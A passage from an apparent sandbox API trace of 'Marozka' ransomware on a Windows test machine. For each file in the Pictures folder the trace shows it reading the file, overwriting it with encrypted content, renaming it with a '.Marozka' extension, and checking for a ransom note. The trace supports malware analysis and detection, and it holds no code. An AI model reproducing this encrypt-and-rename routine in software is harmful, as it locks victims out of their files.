GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp.Marozka", lpFilePart=0x0) returned 0x2a [0055.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.852] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mvxop.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42bbf6f0, ftCreationTime.dwHighDateTime=0x1d4d09b, ftLastAccessTime.dwLowDateTime=0x6bbe160, ftLastAccessTime.dwHighDateTime=0x1d4d38e, ftLastWriteTime.dwLowDateTime=0xe4050e88, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x9ce0)) returned 1 [0055.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.853] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\mvxop.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\mVxOP.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\mvxop.bmp.marozka")) returned 1 [0055.853] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png", lpFilePart=0x0) returned 0x27 [0055.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.853] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myygsj2pgb.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.854] GetFileType (hFile=0x2e0) returned 0x1 [0055.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.854] GetFileType (hFile=0x2e0) returned 0x1 [0055.854] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x35dd [0055.854] ReadFile (in: hFile=0x2e0, lpBuffer=0x27d0e0c, nNumberOfBytesToRead=0x35dd, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27d0e0c*, lpNumberOfBytesRead=0x5beabc*=0x35dd, lpOverlapped=0x0) returned 1 [0055.854] CloseHandle (hObject=0x2e0) returned 1 [0055.893] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.893] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.893] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png", lpFilePart=0x0) returned 0x27 [0055.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myygsj2pgb.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.894] GetFileType (hFile=0x2e0) returned 0x1 [0055.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.894] GetFileType (hFile=0x2e0) returned 0x1 [0055.894] WriteFile (in: hFile=0x2e0, lpBuffer=0x2637e3c*, nNumberOfBytesToWrite=0x35e0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2637e3c*, lpNumberOfBytesWritten=0x5beab0*=0x35e0, lpOverlapped=0x0) returned 1 [0055.896] CloseHandle (hObject=0x2e0) returned 1 [0055.897] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png", lpFilePart=0x0) returned 0x27 [0055.897] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png.Marozka", lpFilePart=0x0) returned 0x2f [0055.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.897] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myygsj2pgb.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd867e690, ftCreationTime.dwHighDateTime=0x1d4cf9d, ftLastAccessTime.dwLowDateTime=0xbb64d060, ftLastAccessTime.dwHighDateTime=0x1d4c950, ftLastWriteTime.dwLowDateTime=0xe40c3551, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x35e0)) returned 1 [0055.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.897] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png" (normalized: "c:\\users\\fd1hvy\\pictures\\myygsj2pgb.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\MyyGSj2pgb.png.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\myygsj2pgb.png.marozka")) returned 1 [0055.898] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg", lpFilePart=0x0) returned 0x23 [0055.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.898] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\nmxwxy.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.898] GetFileType (hFile=0x2e0) returned 0x1 [0055.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.898] GetFileType (hFile=0x2e0) returned 0x1 [0055.898] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x1046e [0055.898] ReadFile (in: hFile=0x2e0, lpBuffer=0x263b8a4, nNumberOfBytesToRead=0x1046e, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x263b8a4*, lpNumberOfBytesRead=0x5beabc*=0x1046e, lpOverlapped=0x0) returned 1 [0055.899] CloseHandle (hObject=0x2e0) returned 1 [0055.973] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0055.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0055.973] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0055.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0055.973] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg", lpFilePart=0x0) returned 0x23 [0055.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0055.973] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\nmxwxy.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.984] GetFileType (hFile=0x2e0) returned 0x1 [0055.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0055.984] GetFileType (hFile=0x2e0) returned 0x1 [0055.984] WriteFile (in: hFile=0x2e0, lpBuffer=0x26b9550*, nNumberOfBytesToWrite=0x10470, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26b9550*, lpNumberOfBytesWritten=0x5beab0*=0x10470, lpOverlapped=0x0) returned 1 [0055.986] CloseHandle (hObject=0x2e0) returned 1 [0055.989] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg", lpFilePart=0x0) returned 0x23 [0055.989] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg.Marozka", lpFilePart=0x0) returned 0x2b [0055.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0055.989] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\nmxwxy.jpg"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76469480, ftCreationTime.dwHighDateTime=0x1d4d1e5, ftLastAccessTime.dwLowDateTime=0xb6b3c1c0, ftLastAccessTime.dwHighDateTime=0x1d4d490, ftLastWriteTime.dwLowDateTime=0xe41a843d, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x10470)) returned 1 [0055.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0055.989] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\nmxwxy.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\NmXwXy.jpg.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\nmxwxy.jpg.marozka")) returned 1 [0055.990] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png", lpFilePart=0x0) returned 0x23 [0055.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0055.990] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\obhpkf.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0055.990] GetFileType (hFile=0x2e0) returned 0x1 [0055.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0055.990] GetFileType (hFile=0x2e0) returned 0x1 [0055.990] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x14aa1 [0055.990] ReadFile (in: hFile=0x2e0, lpBuffer=0x26c9e20, nNumberOfBytesToRead=0x14aa1, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26c9e20*, lpNumberOfBytesRead=0x5beabc*=0x14aa1, lpOverlapped=0x0) returned 1 [0055.991] CloseHandle (hObject=0x2e0) returned 1 [0056.099] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.100] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.100] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png", lpFilePart=0x0) returned 0x23 [0056.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\obhpkf.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.101] GetFileType (hFile=0x2e0) returned 0x1 [0056.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.101] GetFileType (hFile=0x2e0) returned 0x1 [0056.101] WriteFile (in: hFile=0x2e0, lpBuffer=0x2754c30*, nNumberOfBytesToWrite=0x14ab0, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2754c30*, lpNumberOfBytesWritten=0x5beab0*=0x14ab0, lpOverlapped=0x0) returned 1 [0056.103] CloseHandle (hObject=0x2e0) returned 1 [0056.105] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png", lpFilePart=0x0) returned 0x23 [0056.105] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png.Marozka", lpFilePart=0x0) returned 0x2b [0056.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.105] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\obhpkf.png"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x783df990, ftCreationTime.dwHighDateTime=0x1d4d357, ftLastAccessTime.dwLowDateTime=0x3b485450, ftLastAccessTime.dwHighDateTime=0x1d4d374, ftLastWriteTime.dwLowDateTime=0xe42b34b2, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x14ab0)) returned 1 [0056.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.105] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\obhpkf.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\ObhpkF.png.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\obhpkf.png.marozka")) returned 1 [0056.106] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp", lpFilePart=0x0) returned 0x23 [0056.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.106] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\p9vwvu.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.106] GetFileType (hFile=0x2e0) returned 0x1 [0056.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.106] GetFileType (hFile=0x2e0) returned 0x1 [0056.106] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0xec54 [0056.106] ReadFile (in: hFile=0x2e0, lpBuffer=0x2769b40, nNumberOfBytesToRead=0xec54, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2769b40*, lpNumberOfBytesRead=0x5beabc*=0xec54, lpOverlapped=0x0) returned 1 [0056.106] CloseHandle (hObject=0x2e0) returned 1 [0056.123] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.123] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.123] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp", lpFilePart=0x0) returned 0x23 [0056.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.123] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\p9vwvu.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.173] GetFileType (hFile=0x2e0) returned 0x1 [0056.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.173] GetFileType (hFile=0x2e0) returned 0x1 [0056.174] WriteFile (in: hFile=0x2e0, lpBuffer=0x27e2e5c*, nNumberOfBytesToWrite=0xec60, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x27e2e5c*, lpNumberOfBytesWritten=0x5beab0*=0xec60, lpOverlapped=0x0) returned 1 [0056.176] CloseHandle (hObject=0x2e0) returned 1 [0056.178] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp", lpFilePart=0x0) returned 0x23 [0056.178] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp.Marozka", lpFilePart=0x0) returned 0x2b [0056.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0056.178] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\p9vwvu.bmp"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26c38010, ftCreationTime.dwHighDateTime=0x1d4d1fb, ftLastAccessTime.dwLowDateTime=0xc68dd8e0, ftLastAccessTime.dwHighDateTime=0x1d4cdd5, ftLastWriteTime.dwLowDateTime=0xe437202b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xec60)) returned 1 [0056.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0056.178] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\p9vwvu.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\P9VwvU.bmp.Marozka" (normalized: "c:\\users\\fd1hvy\\pictures\\p9vwvu.bmp.marozka")) returned 1 [0056.179] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp", lpFilePart=0x0) returned 0x31 [0056.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0056.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\pfqa3x17qpapo2dqpbez.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.179] GetFileType (hFile=0x2e0) returned 0x1 [0056.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0056.179] GetFileType (hFile=0x2e0) returned 0x1 [0056.179] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x15d8c [0056.179] ReadFile (in: hFile=0x2e0, lpBuffer=0x36e9088, nNumberOfBytesToRead=0x15d8c, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x36e9088*, lpNumberOfBytesRead=0x5beabc*=0x15d8c, lpOverlapped=0x0) returned 1 [0056.179] CloseHandle (hObject=0x2e0) returned 1 [0056.208] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0056.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0056.208] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0056.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0056.208] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp", lpFilePart=0x0) returned 0x31 [0056.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0056.208] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\pfqa3x17qpapo2dqpbez.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0056.210] GetFileType (hFile=0x2e0) returned 0x1 [0056.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0056.210] GetFileType (hFile=0x2e0) returned 0x1 [0056.210] WriteFile (in: hFile=0x2e0, lpBuffer=0x3756490*, nNumberOfBytesToWrite=0x15d90, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x3756490*, lpNumberOfBytesWritten=0x5beab0*=0x15d90, lpOverlapped=0x0) returned 1 [0056.212] CloseHandle (hObject=0x2e0) returned 1 [0056.215] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\pFqA3X17QpaPo2DQPbEz.bmp", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: 